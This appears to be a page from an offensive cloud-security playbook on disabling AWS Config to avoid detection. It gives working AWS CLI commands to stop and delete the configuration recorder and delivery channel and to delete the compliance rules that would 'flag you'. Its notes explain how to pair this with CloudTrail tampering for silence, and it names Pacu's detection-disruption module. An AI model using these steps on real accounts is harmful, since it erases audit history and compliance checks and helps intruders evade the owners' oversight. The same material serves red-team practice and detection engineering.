AWS Config records the configuration state of every resource over time and evaluates it against rules, so it captures the resource changes an operation leaves behind. Stopping the recorder or removing its delivery channel halts that history; deleting rules removes the compliance checks that would flag a change.
Stop the recorder and delivery#
aws configservice describe-configuration-recorders
aws configservice stop-configuration-recorder --configuration-recorder-name default
aws configservice delete-delivery-channel --delivery-channel-name default
aws configservice delete-configuration-recorder --configuration-recorder-name default
Delete the rules that would flag you#
aws configservice describe-config-rules
aws configservice delete-config-rule --config-rule-name <rule>
Exploitation notes#
- Stopping the recorder is a recorded action in CloudTrail; sequence it with the CloudTrail work when silence matters.
- Config is regional and can aggregate across accounts; an organization aggregator in another account keeps collecting even after a local recorder stops.
- Removing the delivery channel quietly breaks history shipping without the obvious "recorder stopped" state.
Tools#
- AWS CLI (
configservice): recorder, delivery-channel, and rule control. - Pacu (
detection__disruption): disables Config alongside CloudTrail and GuardDuty.